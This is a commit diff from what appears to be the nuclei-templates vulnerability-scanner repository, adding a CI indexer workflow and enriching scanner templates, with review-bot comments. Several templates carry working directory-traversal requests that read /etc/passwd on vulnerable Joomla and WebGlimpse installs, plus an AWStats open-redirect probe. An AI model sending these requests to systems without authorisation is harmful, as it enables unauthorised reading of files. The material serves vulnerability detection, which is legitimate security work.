Merge branch 'projectdiscovery:master' into master
commit
b9efa77da3
|
@ -0,0 +1,30 @@
|
|||
name: 📑 Template-DB Indexer
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
- name: Intalling Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
cd nucleish-api/cmd/generate-index/
|
||||
go install
|
||||
|
||||
- name: Generate Index
|
||||
env:
|
||||
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||
run: |
|
||||
generate-index -mode templates
|
||||
generate-index -mode changelog
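Review bot: The `git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github` line writes the access token in plaintext into the runner's global git config and rewrites every GitHub URL for the rest of the job, so the token is presented on every later GitHub request, not only on the one clone it is meant for; pass it through `env:` and use it once in the clone URL (or use `actions/checkout` with `repository:` and `token:` inputs, which is designed to clean the credential up after the job). The workflow has no `permissions:` block, so the default `GITHUB_TOKEN` scope applies; `permissions: contents: read` is enough for what the visible steps do. Both `actions/setup-go@v2` and the cloned `nucleish-api` repository are unpinned, so `go install` builds whatever the default branch holds at the moment a tag is pushed, in a job that also holds AWS keys — pin the action to a commit SHA and check the indexer out at a reviewed commit, and consider replacing the static `AWS_ACCESS_KEY`/`AWS_SECRET_KEY` pair with OIDC role assumption. The step name `Intalling Indexer` is misspelled.
```yaml
permissions:
  contents: read

# … unchanged: on:, jobs.index.runs-on, setup-go step …

      - name: Install indexer
        env:
          ACCESS_TOKEN: ${{ secrets.ACCESS_TOKEN }}
        run: |
          git clone "https://${ACCESS_TOKEN}@github.com/projectdiscovery/nucleish-api.git"
          # pin to a reviewed commit here before building, e.g. git -C nucleish-api checkout <sha>
          cd nucleish-api/cmd/generate-index/
          go install

# … unchanged: Generate Index step …
```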
|
|
@ -10,7 +10,6 @@
|
|||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 955 | daffainfo | 529 | cves | 961 | info | 991 | http | 2660 |
|
||||
| lfi | 400 | dhiyaneshdk | 360 | exposed-panels | 381 | high | 730 | file | 57 |
|
||||
| panel | 383 | pikpikcu | 295 | vulnerabilities | 377 | medium | 544 | network | 48 |
|
||||
| xss | 296 | pdteam | 240 | technologies | 214 | critical | 353 | dns | 16 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 273 | dwisiswant0 | 159 | workflows | 182 | | | | |
|
||||
| rce | 251 | gy741 | 98 | misconfiguration | 182 | | | | |
|
||||
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| cve2021 | 211 | 0x_akoko | 94 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
|
||||
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
|
||||
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
|
||||
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
|
||||
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
|
||||
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
|
||||
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
|
||||
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
|
||||
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
|
||||
|
||||
**203 directories, 2995 files**.
|
||||
**212 directories, 3054 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
2453
TEMPLATES-STATS.md
2453
TEMPLATES-STATS.md
File diff suppressed because it is too large
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 955 | daffainfo | 529 | cves | 961 | info | 991 | http | 2660 |
|
||||
| lfi | 400 | dhiyaneshdk | 360 | exposed-panels | 381 | high | 730 | file | 57 |
|
||||
| panel | 383 | pikpikcu | 295 | vulnerabilities | 377 | medium | 544 | network | 48 |
|
||||
| xss | 296 | pdteam | 240 | technologies | 214 | critical | 353 | dns | 16 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 273 | dwisiswant0 | 159 | workflows | 182 | | | | |
|
||||
| rce | 251 | gy741 | 98 | misconfiguration | 182 | | | | |
|
||||
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| cve2021 | 211 | 0x_akoko | 94 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
|
||||
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
|
||||
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
|
||||
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
|
||||
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
|
||||
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
|
||||
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
|
||||
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
|
||||
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
|
||||
|
|
|
@ -4,9 +4,14 @@ info:
|
|||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
tags: xiuno,cnvd,cnvd2019
|
||||
remediation: There is currently no patch available.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 6.5
|
||||
cwe-id: CWE-276
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/01/26
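Review bot: The added `cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` does not match the description next to it: an attacker who can "directly reinstall the system through the installation page" is reaching a web page (network, not adjacent, access) and is changing the system's state, while the vector records adjacent-network access with no confidentiality or integrity impact. Please check the vector and the 6.5 score against the source they were taken from — the CNVD page is the only reference listed — or drop `cvss-metrics` and keep just `severity`/`cvss-score`. `cwe-id: CWE-276` (incorrect default permissions) is also a loose fit for an installer left reachable after installation. The `requests` block starts at the end of the first hunk and its matchers are only partly visible here.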
|
||||
|
|
|
@ -643,7 +643,7 @@
|
|||
"author": "forgedhallpass",
|
||||
"links": {
|
||||
"github": "https://www.github.com/forgedhallpass",
|
||||
"twitter": "",
|
||||
"twitter": "https://twitter.com/forgedhallpass",
|
||||
"linkedin": "",
|
||||
"website": "",
|
||||
"email": ""
|
||||
|
|
|
@ -5,10 +5,13 @@ info:
|
|||
author: r3naissance
|
||||
severity: low
|
||||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
|
||||
- https://www.exploit-db.com/exploits/19897
|
||||
tags: cve,cve2000,frontpage,microsoft
|
||||
classification:
|
||||
cve-id: CVE-2000-0114
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -25,3 +28,6 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "_vti_bin/shtml.dll"
|
||||
|
||||
|
||||
# Enhanced by mp on 2022/01/27
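Review bot: The added `remediation: Upgrade to the latest version.` is not actionable for this finding: the description locates the leak in FrontPage Server Extensions' `shtml.dll`, so the practical advice is to remove or disable the extensions or restrict access to `/_vti_bin/`, e.g. `remediation: Remove or disable FrontPage Server Extensions, or restrict access to the /_vti_bin/ virtual directory.` The word matcher in the context lines only checks that the response body contains `_vti_bin/shtml.dll`, which an error page echoing the requested path would also satisfy; if no status or second matcher exists outside this hunk, consider adding one. The `requests` block begins before the second hunk and its matcher section is only partly visible.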
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: high
|
||||
tags: network,ssh,openssh,cves,cves2001
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
remediation: Upgrade to SSH 2.4 or later.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
|
@ -24,3 +25,5 @@ network:
|
|||
- type: word
|
||||
words:
|
||||
- "SSH-1"
|
||||
|
||||
# Updated by Chris on 2022/01/21
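Review bot: The tags line `network,ssh,openssh,cves,cves2001` uses `cves`/`cves2001` where every other template in this commit uses `cve`/`cve<year>` (for example `cve,cve2000,frontpage,microsoft`), so filtering on `cve2001` will miss this template; change it to `tags: cve,cve2001,network,ssh,openssh`. The added `remediation: Upgrade to SSH 2.4 or later.` names a version that does not correspond to the issue described, which is the deprecated protocol version 1; the fix is to stop offering it, e.g. `remediation: Disable SSH protocol version 1 on the server (for OpenSSH, set Protocol 2 in sshd_config) and use SSH-2 only.` The `network` block and its matcher start before the second hunk.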
|
||||
|
|
|
@ -4,9 +4,14 @@ info:
|
|||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
||||
reference: https://www.exploit-db.com/exploits/24068
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/24068
|
||||
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
|
||||
tags: xss,squirrelmail,cve2004,cve
|
||||
classification:
|
||||
cve-id: CVE-2004-0519
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -28,3 +33,7 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
||||
# Enhanced by mp on 2022/01/27
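Review bot: The second hunk appends `# Enhanced by mp on 2022/01/27` twice, separated by a blank line; keep a single copy. The rewritten description drops "as other users" from the original sentence, which was the part explaining why this XSS matters in a webmail client (script executes in another user's session); suggest `allow remote attackers to execute arbitrary script as other users and possibly steal authentication information`. The new `ftp://patches.sgi.com/...` reference is a plain-FTP URL that is likely no longer reachable; prefer an https source or the NVD entry for CVE-2004-0519. The `requests` block and its matchers begin before the second hunk.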
|
||||
|
|
|
@ -1,13 +1,19 @@
|
|||
id: CVE-2005-2428
|
||||
info:
|
||||
name: CVE-2005-2428
|
||||
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
|
||||
author: CasperGN
|
||||
severity: medium
|
||||
tags: cve,cve2005
|
||||
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
|
||||
tags: cve,cve2005,domino
|
||||
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
|
||||
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
|
||||
reference:
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2005-2428
|
||||
cwe-id: CWE-200
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -21,5 +27,7 @@ requests:
|
|||
- type: regex
|
||||
name: domino-username
|
||||
regex:
|
||||
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/02/02
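Review bot: The added `remediation: Ensure proper firewalls are in place ...` does not address the cause the description gives — the "Generate HTML for all fields" option emitting `names.nsf` fields as hidden form fields — and is no help for a Domino WebMail server that is intentionally internet-facing; suggest `remediation: Disable 'Generate HTML for all fields' in the names.nsf design and restrict anonymous access to names.nsf via its ACL.` The rewritten description lists three of the five fields the original named and drops ClntPltfrm and ClntMachine; the "including" wording makes that acceptable, but keep the full list if the template is meant to document what is exposed. The regex change from `\"` to `"` is a harmless cleanup inside a single-quoted scalar. The `requests` block starts before the second hunk.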
|
||||
|
|
|
@ -4,11 +4,14 @@ info:
|
|||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
classification:
|
||||
cve-id: CVE-2008-6172
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -25,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2009-5020
|
||||
info:
|
||||
name: AWStats < 6.95 - Open Redirect
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2009-5020
|
||||
tags: cve,cve2020,redirect,awstats
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2009-5020
|
||||
cwe-id: CWE-601
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
|
||||
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
# Enhanced by mp on 2022/02/13
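Review bot: `tags: cve,cve2020,redirect,awstats` carries the wrong year for CVE-2009-5020; it should be `tags: cve,cve2009,redirect,awstats`, otherwise the template is left out of `cve2009` runs and wrongly pulled into `cve2020` ones. `cvss-score: 6.10` is an unquoted float that parses as 6.1 — write `cvss-score: 6.1` to match the other templates. The payload `url=example.com` has no scheme, and the Location regex makes the scheme optional, so if awredir.pl passes the value through unchanged a `Location: example.com` header would match even though browsers resolve it relative to the current origin; `url=https://example.com` (the regex already accepts the scheme-qualified form) proves an off-site redirect. A blank line before `requests:` would match the layout of the other templates.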
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2009-5114
|
||||
|
||||
info:
|
||||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
tags: cve,cve2009,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2009-5114
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0157
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
remediation: Upgrade to a supported version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0157
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0157
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,32 +1,29 @@
|
|||
id: CVE-2010-0467
|
||||
|
||||
info:
|
||||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0467
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
remediation: Apply all relevant security patches and upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.80
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
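Review bot: `reference: |` turns the two URLs under it into one literal block string (`"- https://...\n- https://...\n"`) rather than a YAML sequence, so anything that expects `reference` to be a list gets a string starting with `- `; drop the `|` so it reads `reference:` followed by the two list items, as in the other templates in this commit. The traversal payload ends in `%00`, which depends on null-byte truncation in the target's PHP runtime (historically fixed in PHP 5.3.4), so a miss on a patched runtime does not show the component is absent — a one-line comment on the `path` entry saying so would help whoever triages results.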
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0696
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
remediation: Upgrade to a supported version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11447
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0696
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0696
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0759
|
||||
|
||||
info:
|
||||
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11498
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-0759
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0942
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jvideodirect - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11089
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0942
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0942
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0943
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11090
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0943
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0943
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0944
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jcollection - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11088
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0944
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0944
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0972
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
